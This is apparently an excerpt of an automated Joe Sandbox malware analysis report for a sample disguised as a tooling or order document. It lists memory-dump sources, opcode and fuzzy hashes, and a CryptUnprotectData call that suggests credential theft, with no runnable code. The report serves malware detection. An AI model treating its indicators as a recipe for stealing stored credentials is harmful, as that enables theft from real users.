                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 1eb713edec86ad62827f3bd451d3cf47e782f760bead66210197de3aa259791c
                                                                                                                                                                                                                          • Instruction ID: 82edaed0f7d470dcaff23e7ebf20143753f6add083ec74fe691565573b048f68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb713edec86ad62827f3bd451d3cf47e782f760bead66210197de3aa259791c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D881A574E00619CFDB18DFA9D954ADDBBF2BF88310F148069E809AB365DB349986CF50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 3de4a2144c67b31857c913d9c5cd4953477368be96619227d0f928ce529305e9
                                                                                                                                                                                                                          • Instruction ID: 711fb0f55eccb60885b53df22850dfa098cf1b7bd64b73950ca684f52c5a1bdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3de4a2144c67b31857c913d9c5cd4953477368be96619227d0f928ce529305e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9981C574E00218CFDB18DFA9D994ADDBBF2BF88310F248069E459AB365DB749981CF50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 17f87794ebe7cea1243456a925b30e26c5d7c0d087f56af59be2be48dc58aa3c
                                                                                                                                                                                                                          • Instruction ID: ed0b4cd6ff44be26f24f54af3bb5a1a0f30826a71ac99418201a497207ff12d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17f87794ebe7cea1243456a925b30e26c5d7c0d087f56af59be2be48dc58aa3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6581A374E40218CFDB18DFA9D994ADDBBF2BF88300F248069E409AB365DB749981CF50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 8641b3c1db93d9c77d63ceaf948fa177d629b35af7dfd37b98c5af7344bfd3b6
                                                                                                                                                                                                                          • Instruction ID: b0921b90fee308b215fc9da145b6000134748b808d64e31492411ee94347c4e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8641b3c1db93d9c77d63ceaf948fa177d629b35af7dfd37b98c5af7344bfd3b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F81B474E00618CFDB58DFA9D954ADDBBF2BF88310F148069E819AB365EB349981CF50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$(oZr$,^r$,^r
                                                                                                                                                                                                                          • API String ID: 0-3758845024
                                                                                                                                                                                                                          • Opcode ID: ecf2616548d4b1a180594e60be4707778c945ef094480d3b63e977543abfcb9e
                                                                                                                                                                                                                          • Instruction ID: 4d84e03dc70b48f6b6f069a1a86a124cc3729dd9dde3535ebc3334e5430c8198
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecf2616548d4b1a180594e60be4707778c945ef094480d3b63e977543abfcb9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98024E31A08219DFDB18CFA8D854AEDBBF2BF49304F158069E855AB3A1D734DD81DB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: X^r$X^r$X^r$X^r
                                                                                                                                                                                                                          • API String ID: 0-1944539317
                                                                                                                                                                                                                          • Opcode ID: d1ad70fde465c19675bf12efc04d25818a41296b29248b7ef4120245fd0ff0e7
                                                                                                                                                                                                                          • Instruction ID: ee17d80c9251d1dcb9df02e7d161951694dffc0a8937c9028c5671957dd968a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1ad70fde465c19675bf12efc04d25818a41296b29248b7ef4120245fd0ff0e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BC19E32D103198FCBD98F788D012EA7BB5AF52300F5A45F6D805DB252F7718D869B61
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-3091082374
                                                                                                                                                                                                                          • Opcode ID: b4815c834ad0c2866661ad6a60244037619f3033b23304a25eb1455f18a6f1dd
                                                                                                                                                                                                                          • Instruction ID: 238e710dce006ebf29885198de9493b29cb47795d95f33bb4c392383fdcb6c1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4815c834ad0c2866661ad6a60244037619f3033b23304a25eb1455f18a6f1dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8761D874E012088FDB18DFAAD9946DDBBF2BF88310F14C069E408AB365DB345982CF50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$H^r
                                                                                                                                                                                                                          • API String ID: 0-518277955
                                                                                                                                                                                                                          • Opcode ID: 80bd3494728d0fdd82ae2c0ca0442d5b8dc4f0f77783e57eac369e0924ddff5f
                                                                                                                                                                                                                          • Instruction ID: 1ce40027478f158a9ae6118deaf98621f027528c8249ee17a64411446504126c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80bd3494728d0fdd82ae2c0ca0442d5b8dc4f0f77783e57eac369e0924ddff5f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF124C70A002159FDB18DFA8C854BAEBBF6FF89310F248169E445DB395EB359D41CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 385DD0E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 82012b749b93884c013e75f2c89213d249cab9a79a2906a96e97b0b3ff19f8af
                                                                                                                                                                                                                          • Instruction ID: 747d26b661b26930fd985224de3315e32d0820ba44b110b458fabc8f27734437
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82012b749b93884c013e75f2c89213d249cab9a79a2906a96e97b0b3ff19f8af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F61179B6800249DFDB11CF99C945BEEBFF0EF48320F24881AE958A7210C338A555DFA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 385DD0E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 27ea8991d1ca80ce26755f01810b1cacc00cf370c1f6ac8512526414eae48971
                                                                                                                                                                                                                          • Instruction ID: e4111cfef13062485225c952eb8227eb03a1a4b02522b2b0d642580298516a16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27ea8991d1ca80ce26755f01810b1cacc00cf370c1f6ac8512526414eae48971
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E71164B6800349DFDB10CF99C845BEEBBF4EF88320F24841AE954A7200D739A955DFA5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2e12adce27355e8174048b1be00d98c7aec8714883be9c67ac8a87d6a25ec0e1
                                                                                                                                                                                                                          • Instruction ID: 093214c1689be639d17ac3772bc7b149cc09cc4d4a6aff88879fffec39b092b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e12adce27355e8174048b1be00d98c7aec8714883be9c67ac8a87d6a25ec0e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6481B274E012188FDB58DFA9C891BDDBBB2FF88304F608129D845AB3A5DB395946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 07015a99d53080aa355bb07e0dad69ac9ba1e8ca52f2a3ecee3892c8f8007b97
                                                                                                                                                                                                                          • Instruction ID: 4bbbb8c75360cb8896eb7c1d36aa265adedcc1c1fca800be1fa7450d5233e106
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07015a99d53080aa355bb07e0dad69ac9ba1e8ca52f2a3ecee3892c8f8007b97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE81A375E002188FDB58DFA9C991B9DBBB2FF88300F608129D445BB399DB395946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: db1da3cd786262d8ddd01e71dfb80fc196e1228d958c9cc781fd21fafe6fa3d3
                                                                                                                                                                                                                          • Instruction ID: ca1b29dcd1856fa408a672abfe59f32ecd87dcd308f94541774cd9742c0eea32
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db1da3cd786262d8ddd01e71dfb80fc196e1228d958c9cc781fd21fafe6fa3d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD81B174E002189FDB58DFA9C991B9DBBB2FF88300F608129D804AB3A5DB395946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cb7863a38992982e7bdc609643d7082196950a891bdf27d18288091e1c9f8da9
                                                                                                                                                                                                                          • Instruction ID: 9aba5a770c4ba947e2c492e82b19efd0bf59c8be3e4a159a95ac077d46426082
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb7863a38992982e7bdc609643d7082196950a891bdf27d18288091e1c9f8da9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39517DB5D056989FEB06DFBAD8542CDFFF2AF8A310F1480AEC444AB616D634058ACF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6e56bd44d6a2a1be950f4b58eb94dea36f4386f9bf920f5b2b2049ef7cac6f87
                                                                                                                                                                                                                          • Instruction ID: 828dd74214ee1aafe0edc9172603f01d4c6b129d67adee7e3a8c0201ecb2acf0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e56bd44d6a2a1be950f4b58eb94dea36f4386f9bf920f5b2b2049ef7cac6f87
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F15170B8E113088BDB05DFA6C44469DBFF2BF89304F90C8A9C498AB365DB361946CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e9c57fe22ee7d1e095d04535cee2e27a4b34615a6da015cad97c98e04d4c4c1a
                                                                                                                                                                                                                          • Instruction ID: e177a174d61501aa96f37bd555a3b84a5f838e2e025eb1c216786a198b7ac7ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9c57fe22ee7d1e095d04535cee2e27a4b34615a6da015cad97c98e04d4c4c1a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF519174E002089FEB19DFAAD554ADDBBF2EF89310F24812AE815AB364DB345946CF14
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4549230a7f82e031b01802e59dc77cf69543efd7a1ef276ab5de6414ed19a3ea
                                                                                                                                                                                                                          • Instruction ID: 2cef91519aef1043a4aad7282e6ee3b62f645685759e07f3a0e8208602099f25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4549230a7f82e031b01802e59dc77cf69543efd7a1ef276ab5de6414ed19a3ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E518374E002089FEB19DFEAD554A9DFBF2EF89300F24812AE815AB364DB345945CF54
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b259fee1400d8c9a6c5678ff173ae8431337b3cf27d5411a71e23db2b6c4f081
                                                                                                                                                                                                                          • Instruction ID: 94b3177183ff74093c912217b3466e3b5d066c997d09c5efb1a4497cdb3f6331
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b259fee1400d8c9a6c5678ff173ae8431337b3cf27d5411a71e23db2b6c4f081
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B41F2B4D01618CBEB18CFAAC8447DEBBF2AF88300F60C06AD418BB254DB355986CF54
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9a3648d7487faa324946033ea9c37a8e836c5d379f29795bdd4bce87e67c4809
                                                                                                                                                                                                                          • Instruction ID: a21520728022616e59d7835ddda1f62baf6c7421717cae7dc69217bbb4861deb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a3648d7487faa324946033ea9c37a8e836c5d379f29795bdd4bce87e67c4809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C41F5B5D042088BEB18CFAAC9507DEBBF2BF89304F14C46AC418BB255EB355946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d4120aac323297f67f7e76de7dac7e2b0e3753112b072905ced4f5dd6a87d9e8
                                                                                                                                                                                                                          • Instruction ID: 5e5b559a0205ed50fd8d0c245a47176268efac585788c5df03eb323952dbf1d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4120aac323297f67f7e76de7dac7e2b0e3753112b072905ced4f5dd6a87d9e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC41D3B4E01648CBEB19CFAAC9446DDBBF2BF89300F24C52AD418BB265DB345946CF40

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$(oZr$(oZr$(oZr$(oZr$(oZr$,^r$,^r
                                                                                                                                                                                                                          • API String ID: 0-1216610992
                                                                                                                                                                                                                          • Opcode ID: 0cd6389f55ab1e3a484ae8b1ab9a1cc0c87d9314f1d22c18da2e82450b0a3671
                                                                                                                                                                                                                          • Instruction ID: 13b1e381b87454436d8a721a21952db898f5ce3c8e2fa8d0b6cd0748d62b7f6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cd6389f55ab1e3a484ae8b1ab9a1cc0c87d9314f1d22c18da2e82450b0a3671
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01124B34A086089FCB19CF68D994AEEBBF1EF48714F1585A9E445DB3A1DB30ED81CB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 4;5$`:5$`:5$`:5
                                                                                                                                                                                                                          • API String ID: 0-3460329444
                                                                                                                                                                                                                          • Opcode ID: 4a6942616444a8bf1cf25d22bbcb7fa63a582c9a274abcaf1c1e1d9efaac11c3
                                                                                                                                                                                                                          • Instruction ID: d995e7430f53e86973ddd0e80a7f74d3564cc93adcbf126a90b11b534d600f3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a6942616444a8bf1cf25d22bbcb7fa63a582c9a274abcaf1c1e1d9efaac11c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8610E34E01218CFDB19DFA4D955AEDBBB2FF88304F20812AD845AB3A5DB355A46CF41

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 4'Zr$4'Zr$;Zr
                                                                                                                                                                                                                          • API String ID: 0-2780832812
                                                                                                                                                                                                                          • Opcode ID: c7c3baa584293d0d491f91071030d0ca406e0e0d39a38e0a4c9eda64342ec38f
                                                                                                                                                                                                                          • Instruction ID: 6b8ac3d6649b8b2561b62c04f340363f362e67ba6eec6c570336fa2dde8c9095
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c3baa584293d0d491f91071030d0ca406e0e0d39a38e0a4c9eda64342ec38f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF18E303146018FDB1D9A3AC9647BD7BA6AF81714F1940BAE422CF3A1EB29DCC1D751
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $Zr$$Zr
                                                                                                                                                                                                                          • API String ID: 0-993235432
                                                                                                                                                                                                                          • Opcode ID: c75df92c92e35e955c91514aea2c351e2ea4d84eec6619761474816be95fa15b
                                                                                                                                                                                                                          • Instruction ID: ff5a2c500508f0dd49a5886cdda6a706a4f4c268953f66e71a0b0141f27cd1d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c75df92c92e35e955c91514aea2c351e2ea4d84eec6619761474816be95fa15b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A526534A003088FEB59EFA4D951BDEBBB6EF84300F1085AAD00A6B3A5DF355E459F51
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$4'Zr
